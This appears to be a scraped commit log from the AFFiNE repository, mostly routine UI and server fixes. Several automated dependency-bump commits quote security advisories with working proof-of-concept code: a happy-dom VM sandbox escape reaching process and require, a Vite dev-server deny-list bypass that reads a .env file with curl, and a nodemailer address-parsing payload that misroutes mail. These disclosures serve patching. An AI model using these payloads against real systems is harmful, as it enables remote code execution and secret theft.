a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};' page.content = `<html> <script> function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} this.constructor.constructor.__proto__.__proto__.toString = f; this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f; // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf </script> <body>Hello world!</body></html>`; await browser.close(); console.log(`The process object is ${process}`); console.log(process.hasOwnProperty('spawn')); ``` ### Impact Arbitrary code execution via breaking out of the Node.js' vm isolation. ### Recommended Immediate Actions Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is suggested instead. Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory. --- ### Release Notes <details> <summary>capricorn86/happy-dom (happy-dom)</summary> ### [`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2) ##### :construction\_worker\_man: Patch fixes - Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934) ### [`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1) ##### :construction\_worker\_man: Patch fixes - Adds warning for environment with unfrozen intrinsics (builtins) when JavaScript evaluation is enabled- By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932) - A security advisory has been reported showing that the recommended preventive measure of running Node.js with `--disallow-code-generation-from-strings` wasn't enough to protect against attackers escaping the VM context and accessing process-level functions. Big thanks to [@​cristianstaicu](https://redirect.github.com/cristianstaicu) for reporting this! - The documentation for how to run Happy DOM with JavaScript evaluation enabled in a safer way has been updated. Read more about it in the [Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE1Ni4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
renovate[bot]
|
2c44d3abc6 |
chore: bump up vite version to v7 [SECURITY] (#13786)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.0.3` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-62522](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7) ### Summary Files denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\` when the dev server is running on Windows. ### Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) - running the dev server on Windows ### Details `server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns were able to bypass by using a back slash(`\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`. ### PoC ```shell npm create vite@latest cd vite-project/ cat "secret" > .env npm install npm run dev curl --request-target /.env\ http://localhost:5173 ``` <img width="1593" height="616" alt="image" src="https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175" /> --- ### Release Notes <details> <summary>vitejs/vite (vite)</summary> ### [`v7.1.11`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7111-2025-10-20-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.10...v7.1.11) ##### Bug Fixes - **dev:** trim trailing slash before `server.fs.deny` check ([#​20968](https://redirect.github.com/vitejs/vite/issues/20968)) ([f479cc5]( |
||
|
DarkSky
|
01c164a78a | fix(server): rcat event parse (#13781) | ||
|
L-Sun
|
5c0e3b8a7f |
fix(editor): missing signal of optional flat props (#13762)
Close https://github.com/toeverything/AFFiNE/issues/13750 #### PR Dependency Tree * **PR #13762** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Optional block properties are now supported (e.g., flat-table), with default values applied automatically when not set. * **Bug Fixes** * More reliable initialization and syncing of block properties, ensuring defaults appear consistently. * Change notifications now correctly reflect updates to optional/defaulted properties. * **Tests** * Added tests verifying optional property behavior, default application, syncing, and change events. <!-- end of auto-generated comment: release notes by coderabbit.ai --> #### PR Dependency Tree * **PR #13762** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal)v0.25.1-beta.0 v0.25.1 |
||
|
L-Sun
|
e4f9d42990 |
fix(core): can not scroll all page list in MacOS 26 (#13763)
Close https://github.com/toeverything/AFFiNE/issues/13754 #### PR Dependency Tree * **PR #13763** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Style** * Updated page layout sizing to no longer force full-height on the docs body, allowing height to adapt to content. * Improves natural scrolling and reduces layout constraints in the workspace “All” page. * Enhances responsiveness across varying screen sizes by relying on content and container sizing rules. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
L-Sun
|
59d8d0fbae |
fix(editor): text align not work (#13740)
#### PR Dependency Tree * **PR #13740** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Improved reliability of updating block alignment when the current selection isn’t explicitly defined. The editor now retrieves the selection more consistently, reducing cases where alignment controls appeared unresponsive or had no effect. * Covers scenarios during initialization or edge cases where selection was previously missed, resulting in smoother editing and fewer false negatives when applying alignment. * No changes to visible UI or shortcuts; behavior is simply more consistent. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
renovate[bot]
|
50f41c2212 |
chore: bump up happy-dom version to v20 [SECURITY] (#13726)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`^18.0.0` -> `^20.0.0`](https://renovatebot.com/diffs/npm/happy-dom/18.0.1/20.0.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-61927](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f) # Escape of VM Context gives access to process level functionality ## Summary Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. What the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. ## Reproduce ### CommonJS (Possible to get hold of require) ```javascript const { Window } = require('happy-dom'); const window = new Window({ console }); window.document.write(` <script> const process = this.constructor.constructor('return process')(); const require = process.mainModule.require; console.log('Files:', require('fs').readdirSync('.').slice(0,3)); </script> `); ``` ### ESM (Not possible to get hold of import or require) ```javascript const { Window } = require('happy-dom'); const window = new Window({ console }); window.document.write(` <script> const process = this.constructor.constructor('return process')(); console.log('PID:', process.pid); </script> `); ``` ## Potential Impact #### Server-Side Rendering (SSR) ```javascript const { Window } = require('happy-dom'); const window = new Window(); window.document.innerHTML = userControlledHTML; ``` #### Testing Frameworks Any test suite using Happy-DOM with untrusted content may be at risk. ## Attack Scenarios 1. **Data Exfiltration**: Access to environment variables, configuration files, secrets 2. **Lateral Movement**: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.). 3. **Code Execution**: Child process access for running arbitrary commands 4. **Persistence**: File system access ## Recommended Immediate Actions 1. Update Happy DOM to v20 or above - This version has JavaScript evaluation disabled by default - This version will output a warning if JavaScript is enabled in an insecure environment 2. Run Node.js with the "--disallow-code-generation-from-strings" if you need JavaScript evaluation enabled - This makes sure that evaluation can't be used at process level to escape the VM - `eval()` and `Function()` can still be used within the Happy DOM VM without any known security risk - Happy DOM v20 and above will output a warning if this flag is not in use 4. If you can't update Happy DOM right now, it's recommended to disable JavaScript evaluation, unless you completely trust the content within the environment ## Technical Root Cause All classes and functions inherit from [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function). By walking the constructor chain it's possible to get hold of [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) at process level. As [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) can evaluate code from strings, it's possible to execute code at process level. Running Node with the "--disallow-code-generation-from-strings" flag protects against this. --- ### Release Notes <details> <summary>capricorn86/happy-dom (happy-dom)</summary> ### [`v20.0.0`](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...819d15ba289495439eda8be360d92a614ce22405) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...v20.0.0) ### [`v19.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.1...v19.0.2) ##### :construction\_worker\_man: Patch fixes - Fixes issue related to CSS pseudo selector `:scope` that didn't work correctly for direct descendants to root - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620) ### [`v19.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.0...v19.0.1) ##### :construction\_worker\_man: Patch fixes - Fixes issue with sending in URLs as string in `@happy-dom/server-renderer` config using CLI - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1908](https://redirect.github.com/capricorn86/happy-dom/issues/1908) ### [`v19.0.0`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.0) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v18.0.1...v19.0.0) ##### 💣 Breaking Changes - Removes support for CommonJS - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Support for CommonJS is no longer needed as Node.js v18 is deprecated and v20 and above supports loading ES modules from CommonJS using `require()` - Updates Jest to v30 in the `@happy-dom/jest-environment` package - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Makes Jest packages peer dependencies to make it easier to align versions with the project using `@happy-dom/jest-environment` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) ##### 🎨 Features - Adds a new package called `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - This package provides a simple way to statically render (SSG) or server-side render (SSR) your client-side application - Read more in the Wiki under [Server-Renderer](https://redirect.github.com/capricorn86/happy-dom/wiki/Server-Renderer) - Adds support for `import.meta` to the ESM compiler - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the CSS pseudo selector `:scope` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620) - Improves support for `MediaList` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `CSSKeywordValue`, `CSSStyleValue`, `StylePropertyMap`, `StylePropertyMap`, `StylePropertyMapReadOnly` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Improves debug information in the ESM compiler - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds validation of browser settings when creating a new `Browser` instance - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [navigation.beforeContentCallback](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to inject event listeners or logic before content is loaded to the document when navigating a browser frame - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [fetch.requestHeaders](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which provides with a declarative and simple way to add request headers - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for setting an object to [timer.preventTimerLoops](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define different settings for `setTimeout()` and `requestAnimationFrame()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [viewport](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define a default viewport size - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the parameters `beforeContentCallback` and `headers` to `BrowserFrame.goto()`, `BrowserFrame.goBack()`, `BrowserFrame.goForward()`, `BrowserFrame.goSteps()` and `BrowserFrame.reload()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `PopStateEvent` and trigger the event when navigating the page history using `History.pushState()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Use local file paths for virtual server files in stack traces - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `ResponseCache.fileSystem.load()` and `ResponseCache.fileSystem.save()` for storing and loading cache from the file system - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) ##### :construction\_worker\_man: Patch fixes - Fixes a bug in the ESM compiler that caused it to fail to parse certain code - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Disables the same origin policy when navigating a browser frame using `BrowserFrame.goto()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Fixes bug where CSS selectors with the pseudos "+" and ">" failed for selectors without arguments - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds try and catch to listeners for events dispatched from `XMLHttpRequest` to prevent it from being set to an invalid state if a listener throws an Error - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
Cats Juice
|
a35332634a |
fix(core): correct doc icon padding in editor header (#13721)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Style** * Refined vertical spacing in the document icon picker header, reducing excess top padding and setting a consistent bottom padding for a cleaner, tighter layout. * Improves visual alignment and readability without altering functionality—interactions and behavior remain unchanged. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v0.25.0 |
||
|
DarkSky
|
0063f039a7 |
feat(server): allow cleanup session for deleted docs (#13720)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Resolved occasional errors when removing document links from sessions, ensuring cleanup completes reliably. * Improved reliability during maintenance actions by preventing unnecessary validation failures in system-initiated updates, while preserving existing checks for user-initiated changes. * **Chores** * Internal adjustments to the session update flow to better support maintenance operations without affecting user-facing behavior. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v0.25.0-beta.5 |
||
|
Cats Juice
|
d80ca57e94 |
fix(core): change doc icon layout to avoid incorrect color caused by the transform (#13719)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Style** * Updated document title styling for improved readability (larger font, increased line height, heavier weight). * Refined spacing so titles align correctly when a document icon is present (no extra top padding). * Improved emoji rendering by using a consistent font and removing an unnecessary visual artifact. * Simplified title container behavior to ensure stable, predictable alignment without placeholder-based shifts. * **Chores** * Minor UI cleanup and consistency adjustments for the icon/title area. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Lakr
|
c63e3e7fe6 |
fix(ios): adopt smaller font size for small device (#13715)
This pull request makes minor adjustments to the iOS frontend app, focusing on UI fine-tuning and improving type safety for concurrency. The most notable changes are a small font size adjustment in the paywall badge, marking an enum as `Sendable` for safer concurrency, and removing a StoreKit configuration reference from the Xcode scheme. UI adjustments: * Reduced the font size for the badge text in `PackageOptionView` from 12 to 10 for a more refined appearance. Concurrency and type safety: * Added the `Sendable` protocol conformance to the `SKUnitCategory` enum to ensure it can be safely used across concurrency boundaries. Project configuration: * Removed the `StoreKitConfigurationFileReference` from the `App.xcscheme`, which may help streamline scheme configuration or prevent unnecessary StoreKit file usage during app launch. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - Style - Tweaked paywall option badge text size for a cleaner, more polished look. - Refactor - Improved concurrency safety in underlying models to enhance stability. - Chores - Removed a development-only StoreKit configuration from the iOS debug launch setup. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v0.25.0-beta.4 |
||
|
DarkSky
|
05d373081a |
fix(server): update email verified at oauth (#13714)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Automatic email verification when signing in or reconnecting with a linked OAuth provider: if the provider confirms the same email and your account was unverified, your email will be marked as verified automatically. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
William Guinaudie
|
26fbde6b62 |
fix(core): quick search modal on mobile device (#13694)
When searching on a mobile device, the search modal is wider than the screen, making it hard to use <img width="345" height="454" alt="Screenshot 2025-10-04 at 17 43 54" src="https://github.com/user-attachments/assets/10594459-86c5-470b-a22f-578363694383" /> Now with the fix applied, it is usable <img width="350" height="454" alt="Screenshot 2025-10-04 at 17 44 14" src="https://github.com/user-attachments/assets/eb783f5b-e3b6-4b7d-8f31-0d876911d95f" /> <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - **Style** - Improved mobile responsiveness of the Quick Search modal. On screens 520px wide or smaller, the modal content now adapts its width instead of enforcing a minimum, reducing overflow and improving readability on small devices. - No visual or behavioral changes on larger screens; existing layouts and interactions remain unchanged. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Cats Juice
|
072b5b22df |
fix(core): display affine icon in lit correctly (#13708)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - New Features - Added an alternative icon rendering option for document icons, delivering crisper visuals and consistent emoji/icon display. - Style - Improved icon alignment and sizing within grouped icon buttons for more consistent centering and appearance. <!-- end of auto-generated comment: release notes by coderabbit.ai --> Co-authored-by: Wu Yue <akumatus@gmail.com> |
||
|
3720
|
3c7461a5ce |
fix(editor): adjust callout emoji spacing based on first child block type (#13712)
- Remove fixed marginTop from emoji container style - Dynamically calculate emoji marginTop based on first child block type (h1-h6) - Use model signal to reactively update spacing when children change - Default to 10px for non-heading blocks <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - Style - Improved emoji alignment in callout blocks. The emoji now adjusts its top spacing based on the first line’s heading level, ensuring better vertical alignment with headings (H1–H6) and more consistent visual balance across different callout contents. - Maintains existing margins and layout behavior otherwise, resulting in a cleaner, more polished appearance without affecting functionality. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
1b859a37c5 |
feat: improve attachment headers (#13709)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - **New Features** - Safer, consistent file downloads with automatic attachment headers and filenames. - Smarter MIME detection for uploads (avatars, workspace blobs, Copilot files/transcripts). - Sensible default buffer limit when reading uploads. - **Bug Fixes** - Prevents risky content from rendering inline by forcing downloads and adding no‑sniff protection. - More accurate content types when original metadata is missing or incorrect. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
renovate[bot]
|
bf72833f05 |
chore: bump up nodemailer version to v7.0.7 [SECURITY] (#13704)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`7.0.3` -> `7.0.7`](https://renovatebot.com/diffs/npm/nodemailer/7.0.3/7.0.7) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [GHSA-mm7p-fcc7-pg87](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87) The email parsing library incorrectly handles quoted local-parts containing @​. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target. Payload: `"xclow3n@gmail.com x"@​internal.domain` Using the following code to send mail ``` const nodemailer = require("nodemailer"); let transporter = nodemailer.createTransport({ service: "gmail", auth: { user: "", pass: "", }, }); let mailOptions = { from: '"Test Sender" <your_email@gmail.com>', to: "\"xclow3n@gmail.com x\"@​internal.domain", subject: "Hello from Nodemailer", text: "This is a test email sent using Gmail SMTP and Nodemailer!", }; transporter.sendMail(mailOptions, (error, info) => { if (error) { return console.log("Error: ", error); } console.log("Message sent: %s", info.messageId); }); (async () => { const parser = await import("@​sparser/email-address-parser"); const { EmailAddress, ParsingOptions } = parser.default; const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */); if (!parsed) { console.error("Invalid email address:", mailOptions.to); return; } console.log("Parsed email:", { address: `${parsed.localPart}@​${parsed.domain}`, local: parsed.localPart, domain: parsed.domain, }); })(); ``` Running the script and seeing how this mail is parsed according to RFC ``` Parsed email: { address: '"xclow3n@gmail.com x"@​internal.domain', local: '"xclow3n@gmail.com x"', domain: 'internal.domain' } ``` But the email is sent to `xclow3n@gmail.com` <img width="2128" height="439" alt="Image" src="https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d" /> ### Impact: - Misdelivery / Data leakage: Email is sent to psres.net instead of test.com. - Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts. - Potential compliance issue: Violates RFC 5321/5322 parsing rules. - Domain based access control bypass in downstream applications using your library to send mails ### Recommendations - Fix parser to correctly treat quoted local-parts per RFC 5321/5322. - Add strict validation rejecting local-parts containing embedded @​ unless fully compliant with quoting. --- ### Release Notes <details> <summary>nodemailer/nodemailer (nodemailer)</summary> ### [`v7.0.7`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#707-2025-10-05) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.6...v7.0.7) ##### Bug Fixes - **addressparser:** Fixed addressparser handling of quoted nested email addresses ([1150d99]( |
||
|
DarkSky
|
96b3de8ce7 | chore: update docs | ||
|
DarkSky
|
26a59db540 | chore: update docs | ||
|
Lakr
|
7d0b8aaa81 |
feat(ios): sync paywall with external purchased items (#13681)
This pull request introduces significant improvements to the integration between the paywall feature and the web context within the iOS app. The main focus is on enabling synchronization of subscription states between the app and the embedded web view, refactoring how purchased items are managed, and enhancing the paywall presentation logic. Additionally, some debug-only code has been removed for cleaner production builds. **Paywall and Web Context Integration** * Added support for binding a `WKWebView` context to the paywall, allowing the paywall to communicate with the web view for subscription state updates and retrievals (`Paywall.presentWall` now accepts a `bindWebContext` parameter, and `ViewModel` supports binding and using the web context). [[1]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR10-R32) [[2]](diffhunk://#diff-cb192a424400265435cb06d86b204aa17b4e8195d9dd811580f51faeda211ff0R54-R57) [[3]](diffhunk://#diff-cb192a424400265435cb06d86b204aa17b4e8195d9dd811580f51faeda211ff0L26-R38) [[4]](diffhunk://#diff-1854d318d8fd8736d078f5960373ed440836263649a8193c8ee33e72a99424edL30-R36) * On paywall dismissal, the app now triggers a JavaScript call to update the subscription state in the web view, ensuring consistency between the app and the web context. **Purchased Items Refactor** * Refactored `ViewModel` to distinguish between store-purchased items and externally-purchased items (from the web context), and unified them in a computed `purchasedItems` property. This improves clarity and extensibility for handling entitlements from multiple sources. * Added logic to fetch external entitlements by executing JavaScript in the web view and decoding the subscription information, mapping external plans to internal product identifiers. [[1]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL99-R137) [[2]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR169-R209) **Codebase Cleanup** * Removed debug-only code for shake gesture and debug menu from `AFFiNEViewController`, streamlining the production build. **API and Model Enhancements** * Made `SKUnitCategory` and its extensions public to allow broader usage across modules, and introduced a configuration struct for the paywall. [[1]](diffhunk://#diff-742ccf0c6bafd2db6cb9795382d556fbab90b8855ff38dc340aa39318541517dL10-R17) [[2]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR10-R32) **Other Minor Improvements** * Improved constructor formatting for `PayWallPlugin` for readability. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - New Features - Paywall now binds to the in-app web view so web-based subscriptions are recognized alongside App Store purchases. - Bug Fixes - Entitlements combine App Store and web subscription state for more accurate display. - Dismissing the paywall immediately updates subscription status to reduce stale states. - Improved reliability when presenting the paywall. - Chores - Removed debug shake menu and debug paywall options from iOS builds. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Kieran Cui
|
856b69e1f6 |
fix(core): optimize settings dialog's right-side content scroll position (#13236)
